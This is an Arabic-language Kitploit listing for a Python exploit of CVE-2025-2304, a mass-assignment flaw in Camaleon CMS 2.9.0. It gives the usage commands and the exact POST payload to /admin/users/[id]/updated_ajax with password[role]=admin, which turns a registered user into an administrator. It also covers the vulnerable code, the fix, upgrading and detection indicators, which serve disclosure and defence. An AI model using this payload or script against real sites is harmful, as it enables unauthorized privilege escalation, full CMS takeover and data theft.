Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-2304 — يستغل سكربت بايثون هذا ثغرة حرجة من نوع Mass Assignment في نظام إدارة المحتوى Camaleon CMS الإصدار 2.9.0، مما يسمح لأي مستخدم مسجّل بترقية صلاحياته إلى صلاحيات المسؤول. | Kitploit
أدوات/GitHubGitHub/csuribird/cve-2025-2304
المصادقة والترخيصتصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقسوء التكوينالتعلم والتعليم
GitHubcsuribird/cve-2025-2304

CVE-2025-2304

يستغل سكربت بايثون هذا ثغرة حرجة من نوع Mass Assignment في نظام إدارة المحتوى Camaleon CMS الإصدار 2.9.0، مما يسمح لأي مستخدم مسجّل بترقية صلاحياته إلى صلاحيات المسؤول.

عرض المستودع
51منذ 6 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-2304 - Camaleon CMS 2.9.0 - استغلال تصعيد الامتيازات

نظرة عامة

تستغل هذه السكربتات بلغة Python ثغرة خطيرة من نوع Mass Assignment في نظام Camaleon CMS الإصدار 2.9.0، مما يسمح لأي مستخدم مسجّل بتصعيد صلاحياته إلى صلاحية مسؤول.

تفاصيل الثغرة

  • CVE: CVE-2025-2304 - Mass Assignment في UsersController#updated_ajax
  • الإصدار المتأثر: Camaleon CMS 2.9.0
  • الخطورة: حرجة
  • ناقل الهجوم: دالة permit! في إجراء updated_ajax تسمح بتمرير جميع المعاملات دون تصفية، بما في ذلك معامل role

كيفية عمل الاستغلال

  1. المصادقة: يقوم السكربت أولاً بتسجيل الدخول كمستخدم مسجّل عادي
  2. الاستغلال: يرسل طلب POST إلى /admin/users/[id]/updated_ajax مع حمولة خبيثة: (في السكربت استخدمت المعرّف 5 لأنه عادةً ما يكون المعرّف المخصص تلقائياً. قد يلزم تغييره.)
    • password[role]=admin - يجب أن تتم تصفية هذا المعامل، لكنه لا يُصفّى بسبب permit!
    • password[password] و password[password_confirmation] - لتحديث كلمة مرور المستخدم (عندما يقوم مستخدم عادي بدور client بتحديث ملفه الشخصي، يكون المعامل تقنياً user[role]=client، ولكن لأننا نستغل هنا الثغرة الناتجة عن وظيفة تغيير كلمة المرور، سيكون المعامل password[role]=admin.)
  3. تصعيد الامتيازات: يتم تغيير دور المستخدم من مستخدم عادي إلى مسؤول
  4. التحقق: يحاول السكربت الوصول إلى نقاط نهاية خاصة بالمسؤولين لتأكيد النجاح

التثبيت

root@kitploit:~
pip install -r requirements.txt

الاستخدام

root@kitploit:~
python camaleon_cms_privilege_escalation.py --url http://target-cms.com --username regularuser --password userpassword

معاملات اختيارية

  • --new-password: تعيين كلمة مرور جديدة أثناء الاستغلال (الافتراضي هو كلمة المرور الحالية)

مثال

root@kitploit:~
python camaleon_cms_privilege_escalation.py \
    --url http://192.168.1.100 \
    --username testuser \
    --password testpass123 \
    --new-password newadminpass

تفاصيل تقنية

موقع الكود المعرض للثغرة

توجد الثغرة في إجراء updated_ajax في UsersController:

root@kitploit:~
def updated_ajax
  # كود معرض للثغرة - يستخدم permit! بدلاً من تصفية معاملات محددة
  @user.update(params.require(:user).permit!)
  # هذا يسمح بإسناد أي معامل بشكل جماعي، بما في ذلك role
end

الحمولة الخبيثة

root@kitploit:~
POST /admin/users/[id]/updated_ajax
Content-Type: application/x-www-form-urlencoded

password[password]=newpass123&password[password_confirmation]=newpass123&password[role]=admin&_method=patch

الاستجابة المتوقعة

root@kitploit:~
{
  "success": true,
  "message": "User updated successfully"
}

الأثر

  • تصعيد الامتيازات: يمكن للمستخدمين العاديين الحصول على وصول المسؤول
  • اختراق كامل للنظام: وصول المسؤول يسمح بالتحكم الكامل في نظام CMS
  • خرق البيانات: الوصول إلى جميع بيانات المستخدمين والمحتوى
  • الاستمرارية: القدرة على إنشاء أبواب خلفية والحفاظ على الوصول

التخفيف

للمطورين

استبدل دالة permit! المعرضة للثغرة بتصفية معاملات صريحة:

root@kitploit:~
def updated_ajax
  @user.update(params.require(:user).permit(:password, :password_confirmation, :email))
  # استبعاد معامل role بشكل صريح
end

لمسؤولي الأنظمة

  1. الترقية إلى إصدار مصحح من Camaleon CMS (2.9.1)
  2. تطبيق ضوابط وصول قائمة على الأدوار
  3. إضافة التحقق من المدخلات وتصفية المعاملات
  4. مراقبة محاولات تصعيد الامتيازات المشبوهة

إخلاء مسؤولية قانوني

هذا السكربت لأغراض تعليمية واختبار أمني مصرح به فقط. يرجى عدم استخدام هذا الاستغلال على أنظمة لا تملكها أو ليس لديك إذن صريح لاختبارها. المؤلف غير مسؤول عن أي إساءة استخدام أو ضرر ناتج عن هذه الأداة.

الاكتشاف

يمكن لفرق الأمن اكتشاف محاولات الاستغلال من خلال مراقبة:

  • طلبات POST إلى /admin/users/[id]/updated_ajax مع معامل password[role]
  • تغييرات غير متوقعة في أدوار حسابات المستخدمين
  • أنماط تصعيد الامتيازات في سجلات التدقيق

المراجع

  • توثيق ثغرة Mass Assignment
  • إرشادات أمان Ruby on Rails
  • النشرات الأمنية الخاصة بـ Camaleon CMS
تنزيل الأداة